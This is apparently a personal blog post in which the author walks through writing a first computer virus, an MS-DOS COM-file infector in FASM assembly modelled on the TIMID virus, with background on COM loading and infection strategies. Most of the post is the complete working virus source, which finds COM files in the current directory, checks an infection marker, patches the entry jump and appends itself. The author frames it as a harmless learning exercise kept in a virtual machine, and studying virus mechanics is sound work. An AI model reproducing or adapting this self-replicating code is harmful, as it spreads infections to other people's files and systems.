Those who know me very well know that one of the primary reasons for my learning how to write software, was to write computer viruses. Those who don't know me extremely well may mistakenly assume this was for malicious reasons. It was not, it's somewhat of a secret but there was a time in my life when I was not good with computers at all. If you really want to know why I decided to I wanted to write viruses, you'll just have to ask me in person, because it's somewhat of a personal story for me and it's kind of too dumb to get into here.
For the rest of you who don't care, here's a story about the first, ever, computer virus I've written! To be clear this is a virus in a stricter definition than the public tends to use. This virus infects COM files (yeah, remember those?) and runs in a fairly confined environment (it's current directory). It has no malicious content, with the exception of possibly violating Title 13-2316 paragraphs 2 & 3 (Arizona Title 13-2316). Which of course requires it to be occurring without permissions. Since I'm writing it and keeping it in a virtual machine it pretty much means I'm 100% in the clear. So now that the legal stuff is out of the way, let's talk implementation.
The system I am interested in developing in will be a MS-DOS 6.22 system. I'll be running it in a virtual machine which I will leave the setup as an exercise for the dedicated student. Next I will employ the assembling prowess of the Flat Assembler (FASM). This computer virus is heavily based on the TIMID virus described by Dr. Mark Allen Ludwig in his "The Little Black Book of Computer Viruses." (Amazon)
So let's begin, a little theory seems a good start.
COM files are flat files that are loaded into memory directly. The first bytes (offset 0x0000) are loaded into offset 0x100 in memory and then up. The reason for the 256 byte offset is a throwback to the CP/M operating system called the Program Segment Prefix (PSP). For the particularly curious Wikipedia has a fairly well rounded article here.
Viruses may have several goals and these goals are up to the implementer to choose. For instance, the number 1 priority may be to replicate itself. A reasonable number 2 priority may be to survive. Since I'm really just interested in the fundamentals of virology we'll stick with focusing merely on this number 1 priority - Replication.
The virus, in order to replicate has many options. It may attach itself to the beginning of a file, or to the end, or break itself up and spread itself around in the file (e.g. CIH). Inserting into the start of COM file is difficult if there are any absolute offsets used in the program, as this will shift all of these offsets. And breaking it up, is obviously the most complicated option, though likely one of the best to subvert detection.
Basically, this is my first virus so we'll stick with the easiest, inserting the virus at the end of the COM file.
We'll need a few things:
- A routine which will identify potential files to infect.
- A routine to perform the infection while preserving enough information to reconstruct the original code to continue to execute effectively.
- A payload (may be as simple as just a ret), we'll use a print call when infecting, same as TIMID.
A common issue is that the viral code, when attached to the end of a file will regularly appear in a different location in memory. So we can not rely on too many absolute addresses (with a few exceptions related to the operating system (e.g. the PSP mentioned above). My solution involves determining the current code location and then referencing data members at a regular offset from there, this is probably the most notable variation of TIMID, and the rest is largely the same.
I use various DOS syscall methods, one of the most important is setting up a temporary Disk Transfer Area (DTA) which holds the file handles and data while we read and write files. For a reference to the other DOS syscalls see here.
;Origin is 0x100 - This is for COM files, which include
; a 256 byte PSP (Program Segment Prefix)
org 0x100
use16
start_file:
host:
jmp near virus ;Make it look like this file is infected.
db 'Vx'
virus:
sub esp, 0x80 ; new DTA space.
mov ebp, esp ; ebp will point to our DTA
lea dx, [esp] ; address for new DTA
mov ah, 0x1A ; set DTA
int 0x21 ; syscall, create new DTA space.
call get_start ;
get_start:
pop si ; pull the EIP from the stack, this is our location.
sub si, get_start ; si is ready to handle offsets to the data section
call find_file ; Find an infectable file.
jnz fin ; Failed to find a file, bail.
call infect ; Infect the file!
fin:
push si ; Reimage the host bytes
lea si, [si+HOST_IMAGE]
lea di, [0x100] ; Default starting position
mov cx, 0x05 ; Number of bytes to image
rep movs BYTE [di], [si] ; Copy 5 bytes from *si to *di
pop si ; Restore si
mov dx, 0x80 ; reset to use default DTA
mov ah, 0x1A ; set DTA function
int 0x21 ; syscall
mov esp, 0xFFFF ;
mov ebp, esp ; Restore the stack
push 0x100 ; push the "new" return address
ret
;-----------------------------------------------
;Find infectable files.
;-----------------------------------------------
find_file:
lea dx, [si + files] ; searching COM files
mov ah, 0x4E ; search function id
ff_loop:
mov cl, 0x06 ; attribute mask
int 0x21 ; syscall
or al, al ; checking success: non-zero return (success)
jnz done ; on failure, no file found we're done.
call check_file ; check if this file is infectable
jz done ; file is infectable, return to main
mov ah, 0x4F ; file was not infectable, search next (function id)
jmp ff_loop ; --
check_file:
;First we check the size of the file to ensure our virus can fit in it!
push dx
xor bx, bx ; Clear bx, this represents our soon to be file handle.
mov ax, [ebp + 26] ; Value @ Defaut DTA + offset to file size
cmp ax, 0x05 ; Make sure it's *atleast* 5 bytes
jl bad_file ; File is too small!
add ax, end_file - start_file + 0x100 ; End of virus - start of virus + size of PSP
jc bad_file ; File is too big to accommodate this virus.
mov ax, 0x3D02 ; Open file with read/write
lea dx, [ebp + 30] ; Default DTA + offset of file name
int 0x21 ; open file.
jc bad_file ; failed to open file?
mov bx, ax ; Open succeeded, file handle is in bx.
mov ah, 0x3F ; Read file
mov cx, 0x05 ; 5 bytes worth
lea di, [si + START_IMAGE] ; load the effective address of the start_image
mov dx, di ; dx is actually used in the sycall.
int 0x21 ; syscall
jc bad_file ; error, and we've already ruled out partial reads (less than 5)
;------Ensure the file is not already infected.
cmp BYTE [di], 0xE9 ; Check for the jmp near.
jne good_file ; It wasn't, so it's not infected.
cmp WORD [di+3], 0x7856 ; Check for 'Vx'
je bad_file ; The file was infected, next file.
good_file:
pop dx ; Restore registers
xor al, al ; Return status is good
ret ; Return to caller with the file in the DTA.
bad_file:
or bx, bx ; Checking for a file handle
jz no_handle ; no handle to close
mov ah, 0x3E ; close file
int 0x21 ; syscall - close the file.
no_handle:
pop dx ; Restore registers
mov al, 0x01; Return status is no file found
or al, al ; Set flags for status check
ret ; Return to caller with no file found.
done:
ret
;-----------------------------------------------
;Infect, copy mechanism
;-----------------------------------------------
infect:
;At this point the file is still open, the handle is in bx.
lea di, [ ebp + 26] ; size of com file being infected
mov ax, [di]
mov cx, ax
lea di, [si + START_VIR + 1]; The jmp offset
sub cx, 0x03 ; Remove the near jmp size.
mov [di], cx ; the offset to jmp to
xor ax, ax ; Seek to start
mov cx, ax
xor dx, dx
mov ah, 0x42 ; start of file
int 0x21 ; syscall
mov ah, 0x40 ; write to file
mov cx, 0x05 ; writing 5 bytes.
lea dx, [si + START_VIR]
int 0x21 ; write file
xor ax, ax ; Seek to end
mov cx, ax
xor dx, dx
mov ax, 0x4202 ; end of file
int 0x21 ; syscall
mov ah, 0x40
mov cx, end_file - virus;size of virus
sub cx, 0x05 ; Write all but 5 bytes, this will get start_image
lea dx, [si + virus] ; virus beginning
int 0x21 ; copy the virus out!
mov ah, 0x40 ; do another write to give HOST_IMAGE
lea dx, [si + START_IMAGE] ; to the newly infected file.
mov cx, 0x05 ; Just 5 bytes.
int 0x21 ;
mov ah, 0x3E ;close file
int 0x21 ;syscall
push dx ; print infection message
lea dx, [si + banner]
call print
pop dx
ret
;-----------------------------------------------
;Helper methods, these'll go away in the final product
;-----------------------------------------------
print:
push ax ; Makes this function non-destructive.
mov ah, 0x09 ; Print ASCIIZ
int 0x21 ; print whatever is in ds:dx, this is for debugging
pop ax ; Restore registers
ret ; Return to caller
;-----------------------------------------------
;Data Section
;-----------------------------------------------
banner db 'Catatonic says "Hi!"', 0x0D, 0x0A, 0x24
files db '*.COM', 0x00
START_VIR db 0xE9, 2 dup(?), 'Vx'
START_IMAGE db 0x05 dup(?)
HOST_IMAGE db 0xB8, 0x00, 0x4C, 0xCD, 0x21 ; simple exit program.
end_file:
That's it! Sorry I'm not going more in depth on the specifics - this post is several months old for me now and I figured it'd just push it out instead of breaking it up or other things.
I believe this source code is good (if i recall correctly) and here is a screen shot of the results:
Have fun and stay safe!